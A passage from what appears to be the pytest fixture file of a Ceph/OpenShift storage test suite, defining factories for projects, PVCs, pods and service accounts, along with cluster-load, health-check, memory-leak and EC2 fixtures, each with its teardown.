request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope="function")
def teardown_project_factory(request):
return teardown_project_factory_fixture(request)
def teardown_project_factory_fixture(request):
"""
Tearing down a project that was created during the test
To use this factory, you'll need to pass 'teardown_project_factory' to your test
function and call it in your test when a new project was created and you
want it to be removed in teardown phase:
def test_example(self, teardown_project_factory):
project_obj = create_project(project_name="xyz")
teardown_project_factory(project_obj)
"""
instances = []
def factory(resource_obj):
"""
Args:
resource_obj (OCP object or list of OCP objects) : Object to teardown after the test
"""
if isinstance(resource_obj, list):
instances.extend(resource_obj)
else:
instances.append(resource_obj)
def finalizer():
delete_projects(instances)
request.addfinalizer(finalizer)
return factory
def delete_projects(instances):
"""
Delete the project
instances (list): list of OCP objects (kind is Project)
"""
for instance in instances:
try:
ocp_event = ocp.OCP(kind="Event", namespace=instance.namespace)
events = ocp_event.get()
event_count = len(events["items"])
warn_event_count = 0
for event in events["items"]:
if event["type"] == "Warning":
warn_event_count += 1
log.info(
(
"There were %d events in %s namespace before it's"
" removal (out of which %d were of type Warning)."
" For a full dump of this event list, see DEBUG logs."
),
event_count,
instance.namespace,
warn_event_count,
)
except Exception:
# we don't want any problem to disrupt the teardown itself
log.exception("Failed to get events for project %s", instance.namespace)
ocp.switch_to_default_rook_cluster_project()
instance.delete(resource_name=instance.namespace)
instance.wait_for_delete(instance.namespace, timeout=300)
@pytest.fixture(scope="class")
def pvc_factory_class(request, project_factory_class):
return pvc_factory_fixture(request, project_factory_class)
@pytest.fixture(scope="session")
def pvc_factory_session(request, project_factory_session):
return pvc_factory_fixture(request, project_factory_session)
@pytest.fixture(scope="function")
def pvc_factory(request, project_factory):
return pvc_factory_fixture(
request,
project_factory,
)
def pvc_factory_fixture(request, project_factory):
"""
Create a persistent Volume Claim factory. Calling this fixture creates new
PVC. For custom PVC provide 'storageclass' parameter.
"""
instances = []
active_project = None
active_rbd_storageclass = None
active_cephfs_storageclass = None
def factory(
interface=constants.CEPHBLOCKPOOL,
project=None,
storageclass=None,
size=None,
access_mode=constants.ACCESS_MODE_RWO,
custom_data=None,
status=constants.STATUS_BOUND,
volume_mode=None,
size_unit="Gi",
):
"""
Args:
interface (str): CephBlockPool or CephFileSystem. This decides
whether a RBD based or CephFS resource is created.
RBD is default.
project (object): ocs_ci.ocs.resources.ocs.OCS instance
of 'Project' kind.
storageclass (object): ocs_ci.ocs.resources.ocs.OCS instance
of 'StorageClass' kind.
size (int): The requested size for the PVC
access_mode (str): ReadWriteOnce, ReadOnlyMany or ReadWriteMany.
This decides the access mode to be used for the PVC.
ReadWriteOnce is default.
custom_data (dict): If provided then PVC object is created
by using these data. Parameters `project` and `storageclass`
are not used but reference is set if provided.
status (str): If provided then factory waits for object to reach
desired state.
volume_mode (str): Volume mode for PVC.
eg: volume_mode='Block' to create rbd `block` type volume
size_unit (str): PVC size unit, eg: "Mi"
Returns:
object: helpers.create_pvc instance.
"""
if custom_data:
pvc_obj = PVC(**custom_data)
pvc_obj.create(do_reload=False)
else:
nonlocal active_project
nonlocal active_rbd_storageclass
nonlocal active_cephfs_storageclass
project = project or active_project or project_factory()
active_project = project
if interface == constants.CEPHBLOCKPOOL:
storageclass = storageclass or helpers.default_storage_class(
interface_type=interface
)
active_rbd_storageclass = storageclass
elif interface == constants.CEPHFILESYSTEM:
storageclass = storageclass or helpers.default_storage_class(
interface_type=interface
)
active_cephfs_storageclass = storageclass
pvc_size = f"{size}{size_unit}" if size else None
pvc_obj = helpers.create_pvc(
sc_name=storageclass.name,
namespace=project.namespace,
size=pvc_size,
do_reload=False,
access_mode=access_mode,
volume_mode=volume_mode,
)
assert pvc_obj, "Failed to create PVC"
if status:
helpers.wait_for_resource_state(pvc_obj, status)
pvc_obj.storageclass = storageclass
pvc_obj.project = project
pvc_obj.access_mode = access_mode
instances.append(pvc_obj)
return pvc_obj
def finalizer():
"""
Delete the PVC
"""
pv_objs = []
# Get PVs from PVC instances and delete PVCs
for instance in instances:
if not instance.is_deleted:
pv_objs.append(instance.backed_pv_obj)
instance.delete()
instance.ocp.wait_for_delete(instance.name)
# Wait for PVs to delete
# If they have ReclaimPolicy set to Retain then delete them manually
for pv_obj in pv_objs:
if (
pv_obj.data.get("spec").get("persistentVolumeReclaimPolicy")
== constants.RECLAIM_POLICY_RETAIN
):
helpers.wait_for_resource_state(pv_obj, constants.STATUS_RELEASED)
pv_obj.delete()
pv_obj.ocp.wait_for_delete(pv_obj.name)
else:
pv_obj.ocp.wait_for_delete(resource_name=pv_obj.name, timeout=180)
request.addfinalizer(finalizer)
return factory
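# Usage sketch (hypothetical test, not part of this conftest): create a 5 Gi
# CephFS-backed RWX PVC in a freshly created project; the finalizer above
# deletes the PVC and waits for its PV as well.
#
#     def test_example(pvc_factory):
#         pvc_obj = pvc_factory(
#             interface=constants.CEPHFILESYSTEM,
#             size=5,
#             access_mode=constants.ACCESS_MODE_RWX,
#         )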
@pytest.fixture(scope="class")
def pod_factory_class(request, pvc_factory_class):
return pod_factory_fixture(request, pvc_factory_class)
@pytest.fixture(scope="session")
def pod_factory_session(request, pvc_factory_session):
return pod_factory_fixture(request, pvc_factory_session)
@pytest.fixture(scope="function")
def pod_factory(request, pvc_factory):
return pod_factory_fixture(request, pvc_factory)
def pod_factory_fixture(request, pvc_factory):
"""
Create a Pod factory. Calling this fixture creates new Pod.
For custom Pods provide 'pvc' parameter.
"""
instances = []
def factory(
interface=constants.CEPHBLOCKPOOL,
pvc=None,
custom_data=None,
status=constants.STATUS_RUNNING,
node_name=None,
pod_dict_path=None,
raw_block_pv=False,
deployment_config=False,
service_account=None,
replica_count=1,
command=None,
command_args=None,
subpath=None,
):
"""
Args:
interface (str): CephBlockPool or CephFileSystem. This decides
whether a RBD based or CephFS resource is created.
RBD is default.
pvc (PVC object): ocs_ci.ocs.resources.pvc.PVC instance kind.
custom_data (dict): If provided then Pod object is created
by using these data. Parameter `pvc` is not used but reference
is set if provided.
status (str): If provided then factory waits for object to reach
desired state.
node_name (str): The name of specific node to schedule the pod
pod_dict_path (str): YAML path for the pod.
raw_block_pv (bool): True for creating raw block pv based pod,
False otherwise.
deployment_config (bool): True for DeploymentConfig creation,
False otherwise
service_account (OCS): Service account object, in case DeploymentConfig
is to be created
replica_count (int): The replica count for deployment config
command (list): The command to be executed on the pod
command_args (list): The arguments to be sent to the command running
on the pod
subpath (str): Value of subPath parameter in pod yaml
Returns:
object: Pod (or DeploymentConfig) instance created by helpers.create_pod
"""
sa_name = service_account.name if service_account else None
if custom_data:
pod_obj = helpers.create_resource(**custom_data)
else:
pvc = pvc or pvc_factory(interface=interface)
pod_obj = helpers.create_pod(
pvc_name=pvc.name,
namespace=pvc.namespace,
interface_type=interface,
node_name=node_name,
pod_dict_path=pod_dict_path,
raw_block_pv=raw_block_pv,
dc_deployment=deployment_config,
sa_name=sa_name,
replica_count=replica_count,
command=command,
command_args=command_args,
subpath=subpath,
)
assert pod_obj, "Failed to create pod"
if deployment_config:
dc_name = pod_obj.get_labels().get("name")
dc_ocp_dict = ocp.OCP(
kind=constants.DEPLOYMENTCONFIG, namespace=pod_obj.namespace
).get(resource_name=dc_name)
dc_obj = OCS(**dc_ocp_dict)
instances.append(dc_obj)
else:
instances.append(pod_obj)
if status:
helpers.wait_for_resource_state(pod_obj, status, timeout=300)
pod_obj.reload()
pod_obj.pvc = pvc
if deployment_config:
return dc_obj
return pod_obj
def finalizer():
"""
Delete the Pod or the DeploymentConfig
"""
for instance in instances:
instance.delete()
instance.ocp.wait_for_delete(instance.name)
request.addfinalizer(finalizer)
return factory
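# Illustrative usage sketch for the Pod factory above. The test name is
# hypothetical; the arguments follow the factory signature, and the PVC is
# provided via the PVC factory defined earlier in this module.
#
#   def test_rbd_pod_example(pvc_factory, pod_factory):
#       pvc_obj = pvc_factory(interface=constants.CEPHBLOCKPOOL)
#       pod_obj = pod_factory(
#           interface=constants.CEPHBLOCKPOOL,
#           pvc=pvc_obj,
#           status=constants.STATUS_RUNNING,
#       )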
@pytest.fixture(scope="class")
def teardown_factory_class(request):
return teardown_factory_fixture(request)
@pytest.fixture(scope="session")
def teardown_factory_session(request):
return teardown_factory_fixture(request)
@pytest.fixture(scope="function")
def teardown_factory(request):
return teardown_factory_fixture(request)
def teardown_factory_fixture(request):
"""
Tearing down a resource that was created during the test
To use this factory, you'll need to pass 'teardown_factory' to your test
function and call it in your test when a new resource was created and you
want it to be removed in teardown phase:
def test_example(self, teardown_factory):
pvc_obj = create_pvc()
teardown_factory(pvc_obj)
"""
instances = []
def factory(resource_obj):
"""
Args:
resource_obj (OCS object or list of OCS objects): Object(s) to tear down after the test
"""
if isinstance(resource_obj, list):
instances.extend(resource_obj)
else:
instances.append(resource_obj)
def finalizer():
"""
Delete the resources created in the test
"""
for instance in instances[::-1]:
if not instance.is_deleted:
try:
reclaim_policy = (
instance.reclaim_policy
if instance.kind == constants.PVC
else None
)
instance.delete()
instance.ocp.wait_for_delete(instance.name)
if reclaim_policy == constants.RECLAIM_POLICY_DELETE:
helpers.validate_pv_delete(instance.backed_pv)
except CommandFailed as ex:
log.warning(
f"Resource is already in deleted state, skipping this step"
f"Error: {ex}"
)
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope="class")
def service_account_factory_class(request):
return service_account_factory_fixture(request)
@pytest.fixture(scope="session")
def service_account_factory_session(request):
return service_account_factory_fixture(request)
@pytest.fixture(scope="function")
def service_account_factory(request):
return service_account_factory_fixture(request)
def service_account_factory_fixture(request):
"""
Create a service account
"""
instances = []
active_service_account_obj = None
def factory(project=None, service_account=None):
"""
Args:
project (object): ocs_ci.ocs.resources.ocs.OCS instance
of 'Project' kind.
service_account (str): service_account_name
Returns:
object: serviceaccount instance.
"""
nonlocal active_service_account_obj
if active_service_account_obj and not service_account:
return active_service_account_obj
elif service_account:
sa_obj = helpers.get_serviceaccount_obj(
sa_name=service_account, namespace=project.namespace
)
if not helpers.validate_scc_policy(
sa_name=service_account, namespace=project.namespace
):
helpers.add_scc_policy(
sa_name=service_account, namespace=project.namespace
)
sa_obj.project = project
active_service_account_obj = sa_obj
instances.append(sa_obj)
return sa_obj
else:
sa_obj = helpers.create_serviceaccount(
namespace=project.namespace,
)
sa_obj.project = project
active_service_account_obj = sa_obj
helpers.add_scc_policy(sa_name=sa_obj.name, namespace=project.namespace)
assert sa_obj, "Failed to create serviceaccount"
instances.append(sa_obj)
return sa_obj
def finalizer():
"""
Delete the service account
"""
for instance in instances:
helpers.remove_scc_policy(
sa_name=instance.name, namespace=instance.namespace
)
instance.delete()
instance.ocp.wait_for_delete(resource_name=instance.name)
request.addfinalizer(finalizer)
return factory
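# Illustrative usage sketch for the service account factory above. The test
# name is hypothetical; `project_factory` is the project fixture defined
# earlier in this module.
#
#   def test_service_account_example(project_factory, service_account_factory):
#       project = project_factory()
#       sa_obj = service_account_factory(project=project)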
@pytest.fixture()
def dc_pod_factory(request, pvc_factory, service_account_factory):
"""
Create deploymentconfig pods
"""
instances = []
def factory(
interface=constants.CEPHBLOCKPOOL,
pvc=None,
service_account=None,
size=None,
custom_data=None,
node_name=None,
node_selector=None,
replica_count=1,
raw_block_pv=False,
sa_obj=None,
wait=True,
):
"""
Args:
interface (str): CephBlockPool or CephFileSystem. This decides
whether a RBD based or CephFS resource is created.
RBD is default.
pvc (PVC object): ocs_ci.ocs.resources.pvc.PVC instance kind.
service_account (str): service account name for dc_pods
size (int): The requested size for the PVC
custom_data (dict): If provided then Pod object is created
by using these data. Parameter `pvc` is not used but reference
is set if provided.
node_name (str): The name of specific node to schedule the pod
node_selector (dict): dict of key-value pair to be used for nodeSelector field
eg: {'nodetype': 'app-pod'}
replica_count (int): Replica count for deployment config
raw_block_pv (bool): True for creating a pod based on a raw block PVC,
False otherwise
sa_obj (object): Service account object, if a specific service account
is needed
"""
if custom_data:
dc_pod_obj = helpers.create_resource(**custom_data)
else:
pvc = pvc or pvc_factory(interface=interface, size=size)
sa_obj = sa_obj or service_account_factory(
project=pvc.project, service_account=service_account
)
dc_pod_obj = helpers.create_pod(
interface_type=interface,
pvc_name=pvc.name,
do_reload=False,
namespace=pvc.namespace,
sa_name=sa_obj.name,
dc_deployment=True,
replica_count=replica_count,
node_name=node_name,
node_selector=node_selector,
raw_block_pv=raw_block_pv,
pod_dict_path=constants.FEDORA_DC_YAML,
)
instances.append(dc_pod_obj)
log.info(dc_pod_obj.name)
if wait:
helpers.wait_for_resource_state(
dc_pod_obj, constants.STATUS_RUNNING, timeout=180
)
dc_pod_obj.pvc = pvc
return dc_pod_obj
def finalizer():
"""
Delete dc pods
"""
for instance in instances:
delete_deploymentconfig_pods(instance)
request.addfinalizer(finalizer)
return factory
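# Illustrative usage sketch for the DeploymentConfig pod factory above. The
# test name and values are hypothetical; the arguments follow the factory
# signature.
#
#   def test_dc_pod_example(dc_pod_factory):
#       dc_pod = dc_pod_factory(interface=constants.CEPHFILESYSTEM, size=5)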
@pytest.fixture(scope="session", autouse=True)
def polarion_testsuite_properties(record_testsuite_property, pytestconfig):
"""
Configures polarion testsuite properties for junit xml
"""
polarion_project_id = config.REPORTING["polarion"]["project_id"]
record_testsuite_property("polarion-project-id", polarion_project_id)
jenkins_build_url = config.RUN.get("jenkins_build_url")
if jenkins_build_url:
record_testsuite_property("polarion-custom-description", jenkins_build_url)
polarion_testrun_name = get_testrun_name()
record_testsuite_property("polarion-testrun-id", polarion_testrun_name)
record_testsuite_property("polarion-testrun-status-id", "inprogress")
record_testsuite_property("polarion-custom-isautomated", "True")
@pytest.fixture(scope="session", autouse=True)
def additional_testsuite_properties(record_testsuite_property, pytestconfig):
"""
Configures additional custom testsuite properties for junit xml
"""
# add logs url
logs_url = config.RUN.get("logs_url")
if logs_url:
record_testsuite_property("logs-url", logs_url)
# add run_id
record_testsuite_property("run_id", config.RUN["run_id"])
# Report Portal
launch_name = reporting.get_rp_launch_name()
record_testsuite_property("rp_launch_name", launch_name)
launch_description = reporting.get_rp_launch_description()
record_testsuite_property("rp_launch_description", launch_description)
attributes = reporting.get_rp_launch_attributes()
for key, value in attributes.items():
# Prefix with `rp_` so the rp_preproc upload script knows to use the property
record_testsuite_property(f"rp_{key}", value)
launch_url = config.REPORTING.get("rp_launch_url")
if launch_url:
record_testsuite_property("rp_launch_url", launch_url)
@pytest.fixture(scope="session")
def tier_marks_name():
"""
Gets the tier mark names
Returns:
list: list of tier mark names
"""
tier_marks_name = []
for each_tier in tier_marks:
try:
tier_marks_name.append(each_tier.name)
except AttributeError:
tier_marks_name.append(each_tier().args[0].name)
return tier_marks_name
@pytest.fixture(scope="function", autouse=True)
def health_checker(request, tier_marks_name):
skipped = False
dev_mode = config.RUN["cli_params"].get("dev_mode")
if dev_mode:
log.info("Skipping health checks for development mode")
return
def finalizer():
if not skipped:
try:
teardown = config.RUN["cli_params"]["teardown"]
skip_ocs_deployment = config.ENV_DATA["skip_ocs_deployment"]
mcg_only_deployment = config.ENV_DATA["mcg_only_deployment"]
if not (teardown or skip_ocs_deployment or mcg_only_deployment):
ceph_health_check_base()
log.info("Ceph health check passed at teardown")
except CephHealthException:
log.info("Ceph health check failed at teardown")
# Retrying to increase the chance the cluster health will be OK
# for next test
ceph_health_check()
raise
node = request.node
request.addfinalizer(finalizer)
for mark in node.iter_markers():
if mark.name in tier_marks_name:
log.info("Checking for Ceph Health OK ")
try:
status = ceph_health_check_base()
if status:
log.info("Ceph health check passed at setup")
return
except CephHealthException:
skipped = True
# skip because ceph is not in good health
pytest.skip("Ceph health check failed at setup")
@pytest.fixture(scope="session", autouse=True)
def cluster(request, log_cli_level, record_testsuite_property):
"""
This fixture initiates deployment for both OCP and OCS clusters.
Specific platform deployment classes will handle the fine details
of action
"""
log.info(f"All logs located at {ocsci_log_path()}")
teardown = config.RUN["cli_params"]["teardown"]
deploy = config.RUN["cli_params"]["deploy"]
if teardown or deploy:
factory = dep_factory.DeploymentFactory()
deployer = factory.get_deployment()
# Add a finalizer to teardown the cluster after test execution is finished
if teardown:
def cluster_teardown_finalizer():
# If KMS is configured, clean up the backend resources
# we are doing it before OCP cleanup
if config.DEPLOYMENT.get("kms_deployment"):
kms = KMS.get_kms_deployment()
kms.cleanup()
deployer.destroy_cluster(log_cli_level)
request.addfinalizer(cluster_teardown_finalizer)
log.info("Will teardown cluster because --teardown was provided")
# Download client
if config.DEPLOYMENT["skip_download_client"]:
log.info("Skipping client download")
else:
force_download = (
config.RUN["cli_params"].get("deploy")
and config.DEPLOYMENT["force_download_client"]
)
get_openshift_client(force_download=force_download)
# set environment variable for early testing of RHCOS
if config.ENV_DATA.get("early_testing"):
release_img = config.ENV_DATA["RELEASE_IMG"]
log.info(f"Running early testing of RHCOS with release image: {release_img}")
os.environ["RELEASE_IMG"] = release_img
os.environ["OPENSHIFT_INSTALL_RELEASE_IMAGE_OVERRIDE"] = release_img
if deploy:
# Deploy cluster
deployer.deploy_cluster(log_cli_level)
else:
if config.ENV_DATA["platform"] == constants.IBMCLOUD_PLATFORM:
ibmcloud.login()
record_testsuite_property("rp_ocs_build", get_ocs_build_number())
@pytest.fixture(scope="class")
def environment_checker(request):
node = request.node
# List of marks for which we will ignore the leftover checker
marks_to_ignore = [m.mark for m in [deployment, ignore_leftovers]]
# app labels of resources to be excluded for leftover check
exclude_labels = [constants.must_gather_pod_label]
for mark in node.iter_markers():
if mark in marks_to_ignore:
return
if mark.name == ignore_leftover_label.name:
exclude_labels.extend(list(mark.args))
request.addfinalizer(
partial(get_status_after_execution, exclude_labels=exclude_labels)
)
get_status_before_execution(exclude_labels=exclude_labels)
@pytest.fixture(scope="session")
def log_cli_level(pytestconfig):
"""
Retrieves the log_cli_level set in pytest.ini
Returns:
str: log_cli_level set in pytest.ini or DEBUG if not set
"""
return pytestconfig.getini("log_cli_level") or "DEBUG"
@pytest.fixture(scope="session", autouse=True)
def cluster_load(
request,
project_factory_session,
pvc_factory_session,
service_account_factory_session,
pod_factory_session,
):
"""
Run IO during the test execution
"""
cl_load_obj = None
io_in_bg = config.RUN.get("io_in_bg")
log_utilization = config.RUN.get("log_utilization")
io_load = config.RUN.get("io_load")
cluster_load_error = None
cluster_load_error_msg = (
"Cluster load might not work correctly during this run, because "
"it failed with an exception: %s"
)
# IO load should not happen during deployment
deployment_test = "deployment" in request.node.items[0].location[0]
if io_in_bg and not deployment_test:
io_load = int(io_load) * 0.01
log.info(wrap_msg("Tests will be running while IO is in the background"))
log.info(
"Start running IO in the background. The amount of IO that "
"will be written is going to be determined by the cluster "
"capabilities according to its limit"
)
try:
cl_load_obj = ClusterLoad(
project_factory=project_factory_session,
sa_factory=service_account_factory_session,
pvc_factory=pvc_factory_session,
pod_factory=pod_factory_session,
target_percentage=io_load,
)
cl_load_obj.reach_cluster_load_percentage()
except Exception as ex:
log.error(cluster_load_error_msg, ex)
cluster_load_error = ex
if (log_utilization or io_in_bg) and not deployment_test:
if not cl_load_obj:
try:
cl_load_obj = ClusterLoad()
except Exception as ex:
log.error(cluster_load_error_msg, ex)
cluster_load_error = ex
config.RUN["load_status"] = "running"
def finalizer():
"""
Stop the thread that executed watch_load()
"""
config.RUN["load_status"] = "finished"
if thread:
thread.join()
if cluster_load_error:
raise cluster_load_error
request.addfinalizer(finalizer)
def watch_load():
"""
Watch the cluster load by monitoring the cluster latency.
Print the cluster utilization metrics every 15 seconds.
If IOs are running in the test background, dynamically adjust
the IO load based on the cluster latency.
"""
while config.RUN["load_status"] != "finished":
time.sleep(20)
try:
cl_load_obj.print_metrics(mute_logs=True)
if io_in_bg:
if config.RUN["load_status"] == "running":
cl_load_obj.adjust_load_if_needed()
elif config.RUN["load_status"] == "to_be_paused":
cl_load_obj.reduce_load(pause=True)
config.RUN["load_status"] = "paused"
elif config.RUN["load_status"] == "to_be_reduced":
cl_load_obj.reduce_load(pause=False)
config.RUN["load_status"] = "reduced"
elif config.RUN["load_status"] == "to_be_resumed":
cl_load_obj.resume_load()
config.RUN["load_status"] = "running"
# Any type of exception should be caught and we should continue.
# We don't want any test to fail
except Exception:
continue
thread = threading.Thread(target=watch_load)
thread.start()
def resume_cluster_load_implementation():
"""
Resume cluster load implementation
"""
config.RUN["load_status"] = "to_be_resumed"
try:
for load_status in TimeoutSampler(300, 3, config.RUN.get, "load_status"):
if load_status == "running":
break
except TimeoutExpiredError:
log.error("Cluster load was not resumed successfully")
def reduce_cluster_load_implementation(request, pause, resume=True):
"""
Pause/reduce the background cluster load
Args:
pause (bool): True for completely pausing the cluster load, False for reducing it by 50%
resume (bool): True for resuming the cluster load upon teardown, False for not resuming
"""
if config.RUN.get("io_in_bg"):
def finalizer():
"""
Resume the cluster load
"""
if resume:
resume_cluster_load_implementation()
request.addfinalizer(finalizer)
config.RUN["load_status"] = "to_be_paused" if pause else "to_be_reduced"
try:
for load_status in TimeoutSampler(300, 3, config.RUN.get, "load_status"):
if load_status in ["paused", "reduced"]:
break
except TimeoutExpiredError:
log.error(
f"Cluster load was not {'paused' if pause else 'reduced'} successfully"
)
@pytest.fixture()
def pause_cluster_load(request):
"""
Pause the background cluster load without resuming it
"""
reduce_cluster_load_implementation(request=request, pause=True, resume=False)
@pytest.fixture()
def resume_cluster_load(request):
"""
Resume the background cluster load
"""
if config.RUN.get("io_in_bg"):
def finalizer():
"""
Resume the cluster load
"""
resume_cluster_load_implementation()
request.addfinalizer(finalizer)
@pytest.fixture()
def pause_and_resume_cluster_load(request):
"""
Pause the background cluster load and resume it in teardown to the original load value
"""
reduce_cluster_load_implementation(request=request, pause=True)
@pytest.fixture()
def reduce_and_resume_cluster_load(request):
"""
Reduce the background cluster load to be 50% of what it is and resume the load in teardown
to the original load value
"""
reduce_cluster_load_implementation(request=request, pause=False)
@pytest.fixture(
params=[
pytest.param({"interface": constants.CEPHBLOCKPOOL}),
pytest.param({"interface": constants.CEPHFILESYSTEM}),
],
ids=["RBD", "CephFS"],
)
def interface_iterate(request):
"""
Iterate over interfaces - CephBlockPool and CephFileSystem
"""
return request.param["interface"]
@pytest.fixture(scope="class")
def multi_pvc_factory_class(project_factory_class, pvc_factory_class):
return multi_pvc_factory_fixture(project_factory_class, pvc_factory_class)
@pytest.fixture(scope="session")
def multi_pvc_factory_session(project_factory_session, pvc_factory_session):
return multi_pvc_factory_fixture(project_factory_session, pvc_factory_session)
@pytest.fixture(scope="function")
def multi_pvc_factory(project_factory, pvc_factory):
return multi_pvc_factory_fixture(project_factory, pvc_factory)
def multi_pvc_factory_fixture(project_factory, pvc_factory):
"""
Create a Persistent Volume Claims factory. Calling this fixture creates a
set of new PVCs. Options for PVC creation based on provided access modes:
1. For each PVC, choose random value from the list of access modes
2. Create PVCs based on the specified distribution number of access modes.
Create sets of PVCs based on the order of access modes.
3. Create PVCs based on the specified distribution number of access modes.
The order of PVC creation is independent of access mode.
"""
def factory(
interface=constants.CEPHBLOCKPOOL,
project=None,
storageclass=None,
size=None,
access_modes=None,
access_modes_selection="distribute_sequential",
access_mode_dist_ratio=None,
status=constants.STATUS_BOUND,
num_of_pvc=1,
wait_each=False,
timeout=60,
):
"""
Args:
interface (str): CephBlockPool or CephFileSystem. This decides
whether a RBD based or CephFS resource is created.
RBD is default.
project (object): ocs_ci.ocs.resources.ocs.OCS instance
of 'Project' kind.
storageclass (object): ocs_ci.ocs.resources.ocs.OCS instance
of 'StorageClass' kind.
size (int): The requested size for the PVC
access_modes (list): List of access modes. One of the access modes
will be chosen for creating each PVC. If not specified,
ReadWriteOnce will be selected for all PVCs. To specify
volume mode, append volume mode in the access mode name
separated by '-'.
eg: ['ReadWriteOnce', 'ReadOnlyMany', 'ReadWriteMany',
'ReadWriteMany-Block']
access_modes_selection (str): Decides how to select accessMode for
each PVC from the options given in 'access_modes' list.
Values are 'select_random', 'distribute_random' and 'distribute_sequential'.
'select_random' : While creating each PVC, one access mode will
be selected from the 'access_modes' list.
'distribute_random' : The access modes in the list
'access_modes' will be distributed based on the values in
'distribute_ratio' and the order in which PVCs are created
will not be based on the access modes. For example, 1st and
6th PVC might have same access mode.
'distribute_sequential': The access modes in the list
'access_modes' will be distributed based on the values in
'distribute_ratio' and the order in which PVCs are created
will be as sets of PVCs of the same access mode. For example,
first set of 10 will be having same access mode followed by
next set of 13 with a different access mode.
access_mode_dist_ratio (list): Contains the number of PVCs to be
created for each access mode. If not specified, the given list
of access modes will be equally distributed among the PVCs.
eg: [10,12] for num_of_pvc=22 and
access_modes=['ReadWriteOnce', 'ReadWriteMany']
status (str): If provided then factory waits for object to reach
desired state.
num_of_pvc(int): Number of PVCs to be created
wait_each(bool): True to wait for each PVC to be in status 'status'
before creating next PVC, False otherwise
timeout(int): Time in seconds to wait
Returns:
list: objects of PVC class.
"""
pvc_list = []
if wait_each:
status_tmp = status
else:
status_tmp = ""
project = project or project_factory()
storageclass = storageclass or helpers.default_storage_class(
interface_type=interface
)
access_modes = access_modes or [constants.ACCESS_MODE_RWO]
access_modes_list = []
if access_modes_selection == "select_random":
for _ in range(num_of_pvc):
mode = random.choice(access_modes)
access_modes_list.append(mode)
else:
if not access_mode_dist_ratio:
num_of_modes = len(access_modes)
dist_val = floor(num_of_pvc / num_of_modes)
access_mode_dist_ratio = [dist_val] * num_of_modes
access_mode_dist_ratio[-1] = dist_val + (num_of_pvc % num_of_modes)
zipped_share = list(zip(access_modes, access_mode_dist_ratio))
for mode, share in zipped_share:
access_modes_list.extend([mode] * share)
if access_modes_selection == "distribute_random":
random.shuffle(access_modes_list)
for access_mode in access_modes_list:
if "-" in access_mode:
access_mode, volume_mode = access_mode.split("-")
else:
volume_mode = ""
pvc_obj = pvc_factory(
interface=interface,
project=project,
storageclass=storageclass,
size=size,
access_mode=access_mode,
status=status_tmp,
volume_mode=volume_mode,
)
pvc_list.append(pvc_obj)
pvc_obj.project = project
if status and not wait_each:
for pvc_obj in pvc_list:
helpers.wait_for_resource_state(pvc_obj, status, timeout=timeout)
return pvc_list
return factory
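# Illustrative usage sketch for the multi PVC factory above, distributing two
# access modes sequentially over four PVCs. The test name and values are
# hypothetical; the access mode strings and distribution ratio follow the
# factory docstring.
#
#   def test_multi_pvc_example(project_factory, multi_pvc_factory):
#       project = project_factory()
#       pvc_objs = multi_pvc_factory(
#           interface=constants.CEPHBLOCKPOOL,
#           project=project,
#           size=5,
#           access_modes=["ReadWriteOnce", "ReadWriteMany-Block"],
#           access_mode_dist_ratio=[3, 1],
#           num_of_pvc=4,
#       )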
@pytest.fixture(scope="function")
def memory_leak_function(request):
"""
Function to start Memory leak thread which will be executed parallel with test run
Memory leak data will be captured in all worker nodes for ceph-osd process
Data will be appended in /tmp/(worker)-top-output.txt file for each worker
During teardown created tmp files will be deleted
Usage:
test_case(.., memory_leak_function):
.....
median_dict = helpers.get_memory_leak_median_value()
.....
TC execution part, memory_leak_fun will capture data
....
helpers.memory_leak_analysis(median_dict)
....
"""
def finalizer():
"""
Finalizer to stop memory leak data capture thread and cleanup the files
"""
set_flag_status("terminated")
try:
for status in TimeoutSampler(90, 3, get_flag_status):
if status == "terminated":
break
except TimeoutExpiredError:
log.warning(
"Background test execution still in progress before"
"memory leak thread terminated"
)
if thread:
thread.join()
log_path = ocsci_log_path()
for worker in node.get_worker_nodes():
if os.path.exists(f"/tmp/{worker}-top-output.txt"):
copyfile(
f"/tmp/{worker}-top-output.txt",
f"{log_path}/{worker}-top-output.txt",
)
os.remove(f"/tmp/{worker}-top-output.txt")
log.info("Memory leak capture has stopped")
request.addfinalizer(finalizer)
temp_file = tempfile.NamedTemporaryFile(
mode="w+", prefix="test_status", delete=False
)
def get_flag_status():
with open(temp_file.name, "r") as t_file:
return t_file.readline()
def set_flag_status(value):
with open(temp_file.name, "w") as t_file:
t_file.writelines(value)
set_flag_status("running")
def run_memory_leak_in_bg():
"""
Function to run memory leak in background thread
Memory leak data is written in below format
date time PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
"""
oc = ocp.OCP(namespace=config.ENV_DATA["cluster_namespace"])
while get_flag_status() == "running":
for worker in node.get_worker_nodes():
filename = f"/tmp/{worker}-top-output.txt"
top_cmd = f"debug nodes/{worker} -- chroot /host top -n 2 b"
with open("/tmp/file.txt", "w+") as temp:
temp.write(
str(oc.exec_oc_cmd(command=top_cmd, out_yaml_format=False))
)
temp.seek(0)
for line in temp:
if "ceph-osd" in line:
with open(filename, "a+") as f:
f.write(str(datetime.now()))
f.write(" ")
f.write(line)
log.info("Start memory leak data capture in the test background")
thread = threading.Thread(target=run_memory_leak_in_bg)
thread.start()
@pytest.fixture()
def aws_obj():
"""
Initialize AWS instance
Returns:
AWS: An instance of AWS class
"""
aws_obj = aws.AWS()
return aws_obj
@pytest.fixture()
def ec2_instances(request, aws_obj):
"""
Get cluster instances
Returns:
dict: The ID keys and the name values of the instances
"""
# Get all cluster nodes objects
nodes = node.get_node_objs()
# Get the cluster nodes ec2 instances
ec2_instances = aws.get_instances_ids_and_names(nodes)
assert (
ec2_instances
), f"Failed to get ec2 instances for node {[n.name for n in nodes]}"
def finalizer():
"""
Make sure all instances are running
"""
# Getting the instances that are in status 'stopping' (if there are any), to wait for them to
# get to status 'stopped' so it will be possible to start them
stopping_instances = {
key: val
for key, val in ec2_instances.items()
if (aws_obj.get_instances_status_by_id(key) == constants.INSTANCE_STOPPING)
}
# Waiting for the instances that are in status 'stopping'
# (if there are any) to reach 'stopped'
if stopping_instances:
for stopping_instance in stopping_instances:
instance = aws_obj.get_ec2_instance(stopping_instance)
instance.wait_until_stopped()
stopped_instances = {
key: val
for key, val in ec2_instances.items()
if (aws_obj.get_instances_status_by_id(key) == constants.INSTANCE_STOPPED)
}
# Start the instances
if stopped_instances:
aws_obj.start_ec2_instances(instances=stopped_instances, wait=True)
request.addfinalizer(finalizer)
return ec2_instances
@pytest.fixture(scope="session")
